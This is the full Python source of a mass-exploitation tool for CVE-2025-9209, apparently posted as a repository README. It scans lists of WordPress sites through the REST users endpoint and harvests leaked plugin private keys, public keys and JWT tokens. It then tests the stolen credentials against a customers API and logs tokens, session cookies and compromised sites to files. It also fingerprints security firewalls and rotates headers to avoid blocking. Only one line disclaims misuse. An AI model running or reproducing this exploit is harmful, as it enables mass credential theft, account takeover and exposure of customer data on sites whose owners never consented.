README.md
Rendering markdown...
#!/usr/bin/env python3
from __future__ import annotations
import requests
import urllib3
import json
import re
import threading
import time
import shutil
import subprocess
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path
from typing import Dict, List, Tuple, Optional
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
OUT_FILE = Path("exposures.txt")
TOKENS_FILE = Path("tokens.txt")
EXPLOITED_FILE = Path("exploited_sites.txt")
COOKIES_FILE = Path("cookies.txt")
DEFAULT_THREADS = 10
DEFAULT_DELAY = 0.2
REQUEST_TIMEOUT = 14
try:
from colorama import Fore, Style, init as color_init
color_init(autoreset=True)
except Exception:
class _C: pass
Fore = _C(); Style = _C()
Fore.GREEN = Fore.LIGHTYELLOW_EX = Fore.LIGHTBLACK_EX = Fore.YELLOW = Fore.CYAN = Fore.RED = Fore.WHITE = Fore.MAGENTA = ""
Style.BRIGHT = Style.NORMAL = ""
DEFENDER_INDICATORS = [
"Access denied",
"AntiBot Unlock Me",
"Access denied by Imunify360",
"AntiBot Global Firewall",
"altcha",
"/wp-admin/admin-ajax.php?action=wp_defender",
"imunify",
"blocked your ip",
"blocked your IP",
]
HEADER_VARIANTS = [
{"User-Agent": "curl/7.86.0", "Accept": "*/*", "Connection": "keep-alive"},
{"User-Agent": "curl/7.86.0", "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"},
{"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"},
]
file_lock = threading.Lock()
RE_BCRYPT = re.compile(r'^\$2[ayb]\$')
RE_JWT = re.compile(r'^eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-\.=]*')
RE_HEX = re.compile(r'^[0-9a-fA-F]+$')
def print_banner():
banner = r'''
@@@ @@@ @@@ @@@ @@@@@@@ @@@ @@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@
@@@@ @@@ @@@ @@@ @@@@@@@@ @@@ @@@@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@@
@@!@!@@@ @@! !@@ @@! @@@ @@! @@! @@@ @@! @@! @@! @@! @@@
!@!!@!@! !@! @!! !@! @!@ !@! !@! @!@ !@! !@! !@! !@! @!@
@!@ !!@! !@@!@! @!@@!@! @!! @!@ !@! !!@ @!! @!!!:! @!@ !@!
!@! !!! @!!! !!@!!! !!! !@! !!! !!! !!! !!!!!: !@! !!!
!!: !!! !: :!! !!: !!: !!: !!! !!: !!: !!: !!: !!!
:!: !:! :!: !:! :!: :!: :!: !:! :!: :!: :!: :!: !:!
:: :: :: ::: :: :: :::: ::::: :: :: :: :: :::: :::: ::
:: : : :: : : :: : : : : : : : : :: :: :: : :
'''
print(Fore.GREEN + Style.BRIGHT + banner)
print(Fore.GREEN + Style.BRIGHT + "Mass Exploit for CVE-2025-9209 By: Nxploited (Khaled ALenazi)".center(86))
print(Fore.CYAN + Style.BRIGHT + "GitHub: https://github.com/Nxploited | Telegram: @KNxploited (contact via Telegram)".center(86))
print(Fore.YELLOW + Style.BRIGHT + "\nAuthorized testing only. Use this tool only on data/systems you are permitted to test.\n")
def is_defender_block(text: str) -> bool:
if not text: return False
low = text.lower()
for token in DEFENDER_INDICATORS:
if token.lower() in low:
return True
return False
def run_curl_get(url: str, timeout: int = 15) -> Tuple[str, int]:
cmd = ["curl", "-k", "-s", "--max-time", str(int(timeout)), "-L", url]
try:
p = subprocess.run(cmd, capture_output=True, text=True)
return p.stdout or "", p.returncode
except Exception:
return "", 1
def normalize_site(line: str) -> str:
s = line.strip()
if not s:
return ""
if not s.startswith("http://") and not s.startswith("https://"):
s = "https://" + s
return s.rstrip('/')
def inspect_user_meta(user: Dict) -> List[Dict]:
found = []
meta = user.get("meta") or {}
pk = meta.get("_rp_api_user_private_key")
if isinstance(pk, str) and RE_BCRYPT.match(pk):
found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_private_key", "meta_value": pk, "kind": "private_key"})
pub = meta.get("_rp_api_user_public_key")
if isinstance(pub, str) and (RE_HEX.match(pub) or len(pub) > 40):
found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_public_key", "meta_value": pub, "kind": "public_key"})
tok = meta.get("_rp_api_user_token_key")
if isinstance(tok, str) and RE_JWT.match(tok):
found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_token_key", "meta_value": tok, "kind": "token"})
return found
def summarize_value(val: str, keep_full: bool=False) -> str:
if keep_full: return val
if not val: return ""
v = str(val)
if len(v) <= 20:
return v
return v[:10] + "..." + v[-10:]
def write_exposure(site: str, user_id: str, meta_key: str, summary: str):
with file_lock:
try:
if not OUT_FILE.exists():
OUT_FILE.write_text("# timestamp | site | user_id | meta_key | summary\n", encoding="utf-8")
ts = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime())
with OUT_FILE.open("a", encoding="utf-8") as fh:
fh.write(f"{ts} | {site} | {user_id} | {meta_key} | {summary}\n")
except Exception: pass
def write_token(site: str, user_id: str, token: str):
with file_lock:
try:
if not TOKENS_FILE.exists():
TOKENS_FILE.write_text("# site | user_id | token\n", encoding="utf-8")
with TOKENS_FILE.open("a", encoding="utf-8") as fh:
fh.write(f"{site} | {user_id} | {token}\n")
except Exception: pass
def write_exploited(site: str, count: int):
with file_lock:
try:
if not EXPLOITED_FILE.exists():
EXPLOITED_FILE.write_text("# site | exploited | count\n", encoding="utf-8")
with EXPLOITED_FILE.open("a", encoding="utf-8") as fh:
fh.write(f"{site} | exploited | {count}\n")
except Exception: pass
def write_cookies(site, user_id, cookie, cookies_dict):
with file_lock:
try:
if not COOKIES_FILE.exists():
COOKIES_FILE.write_text("# site | user_id | cookie | cookie_dict\n", encoding="utf-8")
with COOKIES_FILE.open("a", encoding="utf-8") as fh:
fh.write(f"{site} | {user_id} | {cookie} | {cookies_dict}\n")
except Exception: pass
def try_parse_json_fuzzy(text: str):
if not text: return None
try:
return json.loads(text)
except Exception: pass
# Attempt fuzzy recovery of JSON from output
first = None
for i, ch in enumerate(text):
if ch in ('{','['):
first = i
break
if first is None: return None
last = max(text.rfind('}'), text.rfind(']'))
if last <= first: return None
try:
return json.loads(text[first:last+1])
except Exception: return None
def verify_credentials(site: str, user_id: str, token: str, api_key: str) -> Tuple[bool, int, str, str, dict]:
url = site.rstrip('/') + "/wp-json/rp/v1/customers"
headers = {
"Authorization": f"Bearer {token}",
"X-API-Key": api_key,
"X-User-ID": str(user_id),
"Accept": "application/json",
"User-Agent": "curl/7.86.0",
}
try:
r = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT, verify=False, allow_redirects=True)
cookie_str = r.headers.get("Set-Cookie", "")
cookies_dict = r.cookies.get_dict()
body = r.text or ""
snippet = (body[:400] + "...") if len(body) > 400 else body
return (r.status_code == 200, r.status_code, snippet, cookie_str, cookies_dict)
except Exception as e:
return False, -1, str(e), "", {}
def print_mass_exploit(site: str, count: int):
box = "═" * 86
print(Fore.GREEN + Style.BRIGHT + box)
print(Fore.GREEN + Style.BRIGHT + f" 💚💚💚 MASS EXPLOIT SUMMARY — {site} ".center(86, "═"))
print(Fore.GREEN + Style.BRIGHT + box)
print(Fore.GREEN + Style.BRIGHT + f"┃ Accounts found: {Style.BRIGHT}{count}")
print(Fore.GREEN + Style.BRIGHT + box)
print()
def print_success(site: str, user_id, meta_key: str, kind: str):
box = "─" * 86
print(Fore.GREEN + Style.BRIGHT + "[ SUCCESS ]".center(86))
print(Fore.GREEN + Style.NORMAL + f"┃ Site: {Style.BRIGHT}{site}")
print(Fore.GREEN + Style.NORMAL + f"┃ User ID: {Style.BRIGHT}{user_id}")
print(Fore.GREEN + Style.NORMAL + f"┃ Key: {Style.BRIGHT}{meta_key}")
print(Fore.GREEN + Style.NORMAL + f"┃ Type: {Style.BRIGHT}{kind}")
print(Fore.GREEN + box)
print()
def print_token_found(site: str, user_id, token: str):
box = "═" * 86
print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + "➡️ TOKEN FOUND ⬅️".center(86))
print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
print(Fore.LIGHTYELLOW_EX + f"┃ Site: {Style.BRIGHT}{site}")
print(Fore.LIGHTYELLOW_EX + f"┃ User ID: {Style.BRIGHT}{user_id}")
print(Fore.LIGHTYELLOW_EX + f"┃ Token: {Style.BRIGHT}⇒ {token[:18]}...{token[-18:]}")
print(Fore.LIGHTYELLOW_EX + box)
print()
def print_cookie_found(site, user_id, cookie):
box = "═" * 86
print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + "🍪 COOKIE FOUND 🍪".center(86))
print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box)
print(Fore.LIGHTYELLOW_EX + f"┃ Site: {Style.BRIGHT}{site}")
print(Fore.LIGHTYELLOW_EX + f"┃ User ID: {Style.BRIGHT}{user_id}")
print(Fore.LIGHTYELLOW_EX + f"┃ Cookie: {Style.BRIGHT}⇒ {cookie}")
print(Fore.LIGHTYELLOW_EX + box)
print()
def print_failed(site, status=None, ctype=None, snippet=""):
box = "░" * 86
print(Fore.LIGHTBLACK_EX + Style.BRIGHT + "[ FAILED ]".center(86))
print(Fore.LIGHTBLACK_EX + Style.NORMAL + f"┃ Site: {Style.BRIGHT}{site}")
if status is not None:
print(Fore.LIGHTBLACK_EX + f"┃ Status: {Style.BRIGHT}{status}")
if ctype is not None:
print(Fore.LIGHTBLACK_EX + f"┃ Type: {Style.BRIGHT}{ctype}")
if snippet:
print(Fore.LIGHTBLACK_EX + f"┃ Detail: {Style.NORMAL}{snippet[:80]}...")
print(Fore.LIGHTBLACK_EX + Style.BRIGHT + box)
print()
def print_blocked(site):
box = "▒" * 86
print(Fore.YELLOW + Style.BRIGHT + box)
print(Fore.YELLOW + Style.BRIGHT + "[ BLOCKED ]".center(86))
print(Fore.YELLOW + Style.BRIGHT + box)
print(Fore.YELLOW + Style.BRIGHT + f"┃ Site: {site}")
print(Fore.YELLOW + Style.BRIGHT + f"┃ Status: Protected by Defender/Imunify360")
print(Fore.YELLOW + Style.BRIGHT + box)
print()
def scan_site(site: str, verify: bool=False, curl_fallback: bool=False) -> dict:
api_users = site.rstrip('/') + "/wp-json/wp/v2/users?per_page=100"
last_text = ""
status = None
ctype = None
found_tokens = []
exposures = []
for idx, hdrs in enumerate(HEADER_VARIANTS, start=1):
try:
s = requests.Session()
s.headers.update(hdrs)
r = s.get(api_users, timeout=REQUEST_TIMEOUT, verify=False, allow_redirects=True)
status = getattr(r, "status_code", None)
ctype = r.headers.get("Content-Type", "") if r is not None else ""
last_text = r.text or ""
except Exception:
last_text = ""
r = None
status = None
ctype = None
if is_defender_block(last_text):
print_blocked(site)
return {"site": site, "status": status, "content_type": ctype, "exposures": [], "blocked": True}
parsed = try_parse_json_fuzzy(last_text)
if isinstance(parsed, list):
for user in parsed:
found = inspect_user_meta(user)
if found:
for f in found:
exposures.append(f)
elif isinstance(parsed, dict):
found = inspect_user_meta(parsed)
if found:
for f in found:
exposures.append(f)
if exposures:
if len(exposures) > 1:
print_mass_exploit(site, len(exposures))
write_exploited(site, len(exposures))
for e in exposures:
user_id = e.get("user_id")
meta_key = e.get("meta_key")
val = e.get("meta_value")
kind = e.get("kind")
summary = summarize_value(val, keep_full=False)
if kind == "token":
print_token_found(site, user_id, val)
write_token(site, str(user_id), val)
found_tokens.append((site, user_id, val))
if verify:
pub = None
for x in exposures:
if x.get("kind") == "public_key" and (x.get("user_id") == user_id):
pub = x.get("meta_value")
break
if pub:
ok, sc, snippet, cookie_str, cookies_dict = verify_credentials(site, user_id, val, pub)
if cookie_str or cookies_dict:
print_cookie_found(site, user_id, cookie_str if cookie_str else str(cookies_dict))
write_cookies(site, str(user_id), cookie_str, cookies_dict)
print_success(site, user_id, meta_key, kind)
write_exposure(site, str(user_id), meta_key, summary)
return {"site": site, "status": status, "content_type": ctype, "exposures": exposures, "blocked": False, "tokens": found_tokens}
time.sleep(0.12)
if curl_fallback:
curl_path = shutil.which("curl")
if curl_path:
curl_out, rc = run_curl_get(api_users, timeout=REQUEST_TIMEOUT)
if curl_out:
if is_defender_block(curl_out):
print_blocked(site)
return {"site": site, "status": None, "content_type": None, "exposures": [], "blocked": True}
parsed2 = try_parse_json_fuzzy(curl_out)
exposures = []
found_tokens = []
if isinstance(parsed2, list):
for user in parsed2:
found = inspect_user_meta(user)
if found:
exposures.extend(found)
elif isinstance(parsed2, dict):
found = inspect_user_meta(parsed2)
if found:
exposures.extend(found)
if exposures:
if len(exposures) > 1:
print_mass_exploit(site, len(exposures))
write_exploited(site, len(exposures))
for e in exposures:
user_id = e.get("user_id")
meta_key = e.get("meta_key")
val = e.get("meta_value")
kind = e.get("kind")
summary = summarize_value(val, keep_full=False)
if kind == "token":
print_token_found(site, user_id, val)
write_token(site, str(user_id), val)
found_tokens.append((site, user_id, val))
if verify:
pub = None
for x in exposures:
if x.get("kind") == "public_key" and (x.get("user_id") == user_id):
pub = x.get("meta_value")
break
if pub:
ok, sc, snippet, cookie_str, cookies_dict = verify_credentials(site, user_id, val, pub)
if cookie_str or cookies_dict:
print_cookie_found(site, user_id, cookie_str if cookie_str else str(cookies_dict))
write_cookies(site, str(user_id), cookie_str, cookies_dict)
print_success(site, user_id, meta_key, kind)
write_exposure(site, str(user_id), meta_key, summary)
return {"site": site, "status": None, "content_type": None, "exposures": exposures, "blocked": False, "tokens": found_tokens}
print_failed(site, status, ctype, last_text)
return {"site": site, "status": status, "content_type": ctype, "exposures": [], "blocked": False, "tokens": []}
def main():
print_banner()
sites_file = input("Enter sites filename (one per line): ").strip()
if not sites_file:
print(Fore.RED + "No file provided. Exiting.")
return
p = Path(sites_file)
if not p.exists():
print(Fore.RED + f"File not found: {sites_file}")
return
try:
threads = int(input(f"Thread concurrency (default {DEFAULT_THREADS}): ").strip() or DEFAULT_THREADS)
except Exception:
threads = DEFAULT_THREADS
verify_choice = input("Verify discovered token+api_key by calling /wp-json/rp/v1/customers? (y/N): ").strip().lower()
verify = (verify_choice == "y")
curl_choice = input("Use curl fallback if requests fails? (y/N): ").strip().lower()
curl_fallback = (curl_choice == "y")
try:
polite_delay = float(input(f"Polite delay between requests per-thread (seconds, default {DEFAULT_DELAY}): ").strip() or DEFAULT_DELAY)
except Exception:
polite_delay = DEFAULT_DELAY
sites = []
with open(sites_file, "r", encoding="utf-8") as fh:
for line in fh:
s = normalize_site(line)
if s:
sites.append(s)
total = len(sites)
print(Fore.CYAN + f"\nScanning {total} sites with {threads} threads (verify={verify} curl_fallback={curl_fallback})\n")
start = time.time()
def worker(site: str):
scan_site(site, verify=verify, curl_fallback=curl_fallback)
time.sleep(polite_delay)
with ThreadPoolExecutor(max_workers=threads) as exe:
futures = [exe.submit(worker, s) for s in sites]
try:
for _ in as_completed(futures):
pass
except KeyboardInterrupt:
print(Fore.RED + "\nInterrupted by user. Shutting down.")
exe.shutdown(wait=False)
elapsed = time.time() - start
print(Fore.GREEN + f"\n[Done] in {elapsed:.1f} seconds.")
print(Fore.GREEN + f"\n[exposures.txt] : exposures per account/credential")
print(Fore.LIGHTYELLOW_EX + f"[tokens.txt] : All tokens found in scan")
print(Fore.LIGHTYELLOW_EX + f"[cookies.txt] : All cookies found in scan")
print(Fore.GREEN + f"[exploited_sites.txt] : Mass exploited sites")
if __name__ == "__main__":
main()